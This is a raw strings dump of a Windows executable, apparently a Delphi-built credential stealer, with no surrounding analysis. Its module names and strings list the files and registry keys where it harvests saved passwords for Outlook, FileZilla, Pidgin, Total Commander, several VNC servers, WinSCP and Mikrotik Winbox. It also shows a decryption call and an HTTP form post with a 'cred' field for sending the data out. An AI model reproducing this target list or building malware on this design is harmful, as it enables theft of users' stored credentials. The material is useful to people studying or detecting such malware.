This program must be run under Win32
.idata
.edata
P.reloc
P.rsrc
StringX
TObjectd
TObjectX
System
IInterface
System
TInterfacedObject
YZ]_^[
Ht Ht.
~KxI[)
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
_^[YY]
ZTUWVSPRTj
_^[YY]
_^[YY]
kernel32.dll
GetLongPathNameA
Software\Borland\Locales
Software\Borland\Delphi\Locales
_^[YY]
Exception@k@
EHeapException
EOutOfMemory
EInOutErrorPl@
EExternal
EExternalException
EIntError
EDivByZero
ERangeError
EIntOverflow
EMathError
EInvalidOp
EZeroDivideto@
EOverflow
EUnderflow
EInvalidPointer
EInvalidCast
EConvertError
EAccessViolation
EPrivilege
EStackOverflow
EControlC
EVariantError
EAssertionFailed
EAbstractError
EIntfCastError
EOSError
ESafecallException
SysUtils
SysUtils
TThreadLocalCounter
$TMultiReadExclusiveWriteSynchronizer
<*t"<0r=<9w9i
INFNAN
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
t%HtIHtm
_^[YY]
$Z]_^[
QQQQQQSVW3
QQQQQSVW
_^[YY]
TErrorRec
TExceptRec
$YZ]_^[
m/d/yy
mmmm d, yyyy
:mm:ss
kernel32.dll
GetDiskFreeSpaceExA
YZ]_^[
YZ]_^[
YZ]_^[
9ee64c9522e00b3fe2dbacd05c500ac8
c3c65\
2660bY
wh}oZh5
a8e9aJ
03da88
03da88
03da88
QQQQQQQSVW
0x%.2x%.2x%.2x%.2x%.2x%.2x
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
!!!!<own>!
Winbox
abcdefghijklmnopqrstuvwxyz1234567890,.:@#$%^&*(){}~<>?
QQQQQQQSVW
\Mikrotik\Winbox\Addresses.cdb
oleaut32.dll
VariantChangeTypeEx
VarNeg
VarNot
VarAdd
VarSub
VarMul
VarDiv
VarIdiv
VarMod
VarAnd
VarXor
VarCmp
VarI4FromStr
VarR4FromStr
VarR8FromStr
VarDateFromStr
VarCyFromStr
VarBoolFromStr
VarBstrFromCy
VarBstrFromDate
VarBstrFromBool
TCustomVariantType
TCustomVariantType
Variants
EVariantInvalidOpError
EVariantTypeCastError
EVariantOverflowError
EVariantInvalidArgError\
EVariantBadVarTypeError
EVariantBadIndexError
EVariantArrayLockedError
EVariantArrayCreateError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantUnexpectedError$
EVariantDispatchError
QQQQSV
Smallint
Integer
Single
Double
Currency
OleStr
Dispatch
Boolean
Variant
Unknown
Decimal
ShortInt
LongWord
String
Array
ByRef
Variants
_^[YY]
EStreamError
EFileStreamError
EFCreateError
EFOpenError
EFilerError
EReadError
EWriteError
EListError
EStringListError
TThreadList
TPersistent
TPersistent
Classes
IStringsAdapter
Classes
TStrings
TStrings
Classes
TStringItem
TStringList
TStringList
Classes
TStream
THandleStream
TFileStream
TRegGroup
TRegGroups
Strings
S$_^[Y]
_^[YY]
SdZ]_^[
$Z]_^[
_^[YY]
ERegistryException
TRegistryS
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Outlook
IMAP User
IMAP Password
POP3 User
POP3 Password
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
QQQQQQSVW
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
QQQQQQ
<Host>
</Host>
FileZilla
<User>
</User>
<Pass encoding="base64">
</Pass>
\FileZilla\sitemanager.xml
PSAPI.dll
EnumProcesses
EnumProcessModules
GetModuleBaseNameA
GetModuleFileNameExA
GetModuleBaseNameW
GetModuleFileNameExW
GetModuleInformation
EmptyWorkingSet
QueryWorkingSet
InitializeProcessForWsWatch
GetMappedFileNameA
GetDeviceDriverBaseNameA
GetDeviceDriverFileNameA
GetMappedFileNameW
GetDeviceDriverBaseNameW
GetDeviceDriverFileNameW
EnumDeviceDrivers
GetProcessMemoryInfo
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Pidgin
\.purple\accounts.xml
\Wcx_ftp.ini
username=
password=
Local Settings\Software\Microsoft\Windows\Shell\MuiCache
\wcx_ftp.ini
\wcx_ftp.ini
SOFTWARE\RealVNC\vncserver\Password
SOFTWARE\RealVNC\vncserver\RfbPort
SOFTWARE\RealVNC\vncserver\HttpPort
RealVNC
SOFTWARE\RealVNC\WinVNC4\Password
SOFTWARE\RealVNC\WinVNC4\PortNumber
SOFTWARE\TightVNC\Server\Password
SOFTWARE\TightVNC\Server\RfbPort
SOFTWARE\TightVNC\Server\HttpPort
TightVNC
SOFTWARE\TightVNC\Server\PasswordViewOnly
QQQQQQQ3
SOFTWARE\TigerVNC\WinVNC4\Password
SOFTWARE\TigerVNC\WinVNC4\PortNumber
SOFTWARE\TigerVNC\WinVNC4\HTTPPortNumber
TigerVNC
QQQQSVW
HostName=
UserName=
Password=
WinSCP
\winscp.ini
WinScp
Local Settings\Software\Microsoft\Windows\Shell\MuiCache
winscp
QQQQQQQQ
Software\Martin Prikryl\WinSCP 2\Sessions\
\HostName
\UserName
\Password
WinSCP
Software\Martin Prikryl\WinSCP 2\Sessions
HTTP/1.1
Host:
Content-Length:
Content-Type: application/x-www-form-urlencoded
QQQQSVW
QQQQQQQS
&cred=
Runtime error at 00000000
0123456789ABCDEF
%.*d$i@
Qkkbal
;3+#>6.&
'2, /+0&7!4-)1#
0123456789ABCDEF<i@
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetVersion
GetCurrentThreadId
InterlockedDecrement
InterlockedIncrement
VirtualQuery
WideCharToMultiByte
MultiByteToWideChar
lstrlenA
lstrcpynA
LoadLibraryExA
GetThreadLocale
GetStartupInfoA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLastError
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
ExitProcess
WriteFile
UnhandledExceptionFilter
SetFilePointer
SetEndOfFile
RtlUnwind
ReadFile
RaiseException
GetStdHandle
GetFileSize
GetFileType
CreateFileA
CloseHandle
user32.dll
GetKeyboardType
LoadStringA
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
TlsFree
TlsAlloc
LocalFree
LocalAlloc
advapi32.dll
RegQueryValueExA
RegQueryInfoKeyA
RegOpenKeyExA
RegOpenKeyA
RegFlushKey
RegEnumValueA
RegEnumKeyA
RegEnumKeyExA
RegCreateKeyExA
RegCloseKey
OpenThreadToken
OpenProcessToken
IsValidSid
GetTokenInformation
GetSidSubAuthorityCount
GetSidSubAuthority
GetSidIdentifierAuthority
kernel32.dll
WriteFile
WideCharToMultiByte
WaitForSingleObject
VirtualQuery
SetLastError
SetFilePointer
SetEvent
SetEndOfFile
ResetEvent
ReadFile
OpenProcess
LocalFree
LoadLibraryA
LeaveCriticalSection
InitializeCriticalSection
HeapFree
HeapAlloc
GetVersionExA
GetThreadLocale
GetStringTypeExA
GetStdHandle
GetProcessHeap
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLocalTime
GetLastError
GetFullPathNameA
GetDiskFreeSpaceA
GetDateFormatA
GetCurrentThreadId
GetCurrentThread
GetCurrentProcess
GetCPInfo
GetACP
FormatMessageA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
EnumCalendarInfoA
EnterCriticalSection
DeleteCriticalSection
CreateMutexA
CreateFileA
CreateEventA
CompareStringA
CloseHandle
user32.dll
MessageBoxA
LoadStringA
GetSystemMetrics
CharNextA
CharUpperBuffA
CharToOemA
kernel32.dll
wsock32.dll
WSACleanup
WSAStartup
gethostname
gethostbyname
socket
inet_ntoa
connect
closesocket
oleaut32.dll
SafeArrayPtrOfIndex
SafeArrayGetUBound
SafeArrayGetLBound
SafeArrayCreate
VariantChangeType
VariantCopy
VariantClear
VariantInit
crypt32.dll
CryptUnprotectData
cred.dll
0,080<0@0D0H0L0P0T0`0m0
1 1(1,1014181<1@1D1H1b1j1r1z1
2"2*222:2B2J2R2Z2b2j2r2z2
3!3N3Y3(4/4
;,;7;B;J;T;^;h;~;
<<'<2<8<E<J<o<y<
2F2K2P2
585>5P5h5t5|5
5+63696?6r6
6T7\7b7h7u7{7
949@9H9
:3:L:e:v:
<#=L=S=Z=*>?>r>
>$?+?f?
1"1D3K3\3h3
4w5/6G6X6t6
819A9W9u9
<Z=n=v=
>">,>?>o>
#1K1R1j1
3"3'3,31363D3N3y3
3$4/4L4V4{4
515E5Q5j5
;";b;i;};
2$2-292C2j2
213O3Y3d3x3
44)4G4L4_4k4x4
5"5*525:5B5J5R5Z5b5j5r5
6"6*626:6B6J6R6Z6b6j6r6z6
7"7S7_7l7~7
8$8,848<8D8L8T8\8d8l8t8|8
9$9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:L:[:g:t:
; ;$;(;,;0;4;8;<;P;p;x;|;
<$<,<0<4<8<<<@<D<H<L<\<|<
=4=<=@=D=H=L=P=T=X=\=l=
> >@>H>L>P>T>X>\>`>d>h>x>
?(?H?P?T?X?\?`?d?h?l?p?
0 040T0\0`0d0h0l0p0t0x0|0
1 1$1(1,10141L1l1t1x1|1
2 2(2,2024282<2@2D2H2X2x2
343<3@3D3H3L3P3T3X3\3p3
4$4D4L4P4T4X4\4`4d4h4l4
5 5x5|5
5T6m:}:
:Z;m;y;
3f4Q6}6
717L7P7T7X7\7
5(6,6064686<6@6D6H6L6P6T6X6\6`6d6M7g7
=!>t>.?r?w?
20S0f0n0
1&2<2I2N2`2
7.737?7b7
8?8I8o8
8+9:9T9f9
<V<^<i<
0%080P0o0w0
1.2_2y2
5$5)5/565<5A5G5L5R5Y5_5j5r5{5
6-686=6v6
8%999_9s9p;
<5<A<Z<d<n<
=A=_=|=
>%>@>I>d>w>
?.?7?K?Y?m?
0.060K0S0p0}0Z1M2r2
2(3R3b3m3s3{3
588<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
9$9(90949<9@9H9L9T9X9`9d9l9p9x9|9
: :$:,:0:8:<:D:H:P:T:\:`:h:l:t:x:
;";6;A;K;V;`;k;u;
<&<0<:<D<N<X<b<t<
=&=.=6=>=F=N=V=c=o=|=
8?8K8X8j8{9
:*:4:9:
?g?s?z?
4"4C4U4
6"6'6.636=6G6Q6X6o6
:+:7:D:V:^:f:n:v:
?+?0?;?A?F?Q?W?\?g?m?r?}?
0"0-03080C0I0N0Y0_0d0o0u0z0
1+272D2V2
3 3$3(3,3034383P3h3l3
4 4$4(4,4H4h4p4t4x4|4
50585<5@5D5H5L5P5T5X5t5
6 6@6`6h6l6p6t6x6|6
7,74787<7@7D7H7L7P7T7t7
8 8E8S8b8y8
959C9R9i9
9%:3:B:Y:
;=;L;c;r;
<-<><p<
4 5=5u5
5(6^6z6~6
99#9'9+9/93979;9?9C9G9K9O9S9W9+;
<*=G=}=
0!0%0)0-0105090=0A0E0I0M0Q0U0Y0]0a0e0i0=2X4w4
5-5@5R5
6,6F6K6
91969W9c9o9y9
:$:+:1:8:>:E:K:R:d:t:|:
;O;[;b;l;w;
< <4<T<\<`<d<h<l<p<t<x<|<
= =$=(=,=0=4=8=H=h=p=t=x=|=
> >$>(>,>0>4>8><>@>P>p>x>|>
?(?0?4?8?<?@?D?H?L?P?T?X?\?`?l?
0"0&080I0M0`0u0
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1n1
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
3 3$3(3,3034383<3@3D3P3p3x3|3
4 4$4(4,4<4\4d4h4l4p4t4x4|4
9%979b9
;<&<=<
>6>c>|>
>?n?w?
4@5R5o5
4Y5`5w5
;;;?;C;G;K;O;S;W;[;_;c;g;k;o;s;w;{;
?:???Q?o?{?
00+080D0W0c0m0t0~0
141<1@1D1H1L1P1T1X1\1t1
6?7K7R7]7o7
<)<0<?<S<w<
=:=X=_=
=H?S?m?
3)3B3j3
434;4B4\4q4
9&9+989=9J9O9\9a9n9s9
:":':4:9:F:K:X:]:j:o:|:
?,?I?^?s?
0<0m0r0w0~0
809b9%:=:
=1=C=O=V=`=r=
m0r0h2w2
3.3=3L3Y3
4*4v435
616[6f6
707B7T7d7i7n7u7z7
8 8%8.8N8U8l8
: :):I:P:_:y:
;);;;M;];b;g;n;s;{;
<#<+<0<9<Y<`<w<
>)>0>?>Y>k>}>
0;0G0N0X0j0z0
6!7&7+72777A7K7m7t7
<#<+<M<U<w<
?#?*?<?N?w?
5#5E5X5h5p5
7!7)7.767;7C7\7
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
<0@0D0
0X1`1d1
2 2$2(2,2024282<2@2D2
3 3(383<3@3D3H3L3P3T3X3\3`3d3
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
TlHelp32
System
SysInit
KWindows
UTypes
Base64
8Registry
"RTLConsts
^Classes
SysConst
3Messages
SysUtils
CVariants
$VarUtils
QTypInfo
sActiveX
IniFiles
MiniReg64
Stealer_Var
Stealer_WinSCP
Stealer_VNC
WinSock
|Stealer_TotalCmd
Stealer_Pidgin
PStealer_FileZilla
rStealer_MSOutlook
Stealer_Winbox
UserSid
jjjjjjj
DVCLAL
PACKAGEINFO
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Stream read error
Failed to get data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
Stream write error
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Cannot assign a %s to a %s%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid property value
Invalid data type for '%s'
January
February
August
September
October
November
December
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
%sA call to an OS function failed
Variant or safe array is lockedInvalid variant type conversion
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Variant overflow
Invalid argument
Invalid variant type
Operation not supported
Unexpected variant error
External exception %x
Assertion failed
Interface not supported
Exception in safecall method
%s (%s, line %d)
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Access violation
Stack overflow
Control-C hit
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Write$Error creating variant or safe array)Variant or safe array index out of bounds
Out of memory
I/O error %d
File not found
Invalid filename
Too many open files
File access denied
Read beyond end of file
Disk full
Invalid numeric input
Division by zero
Range check error
Integer overflow Invalid floating point operationFloating point division by zero
Floating point overflow
Floating point underflow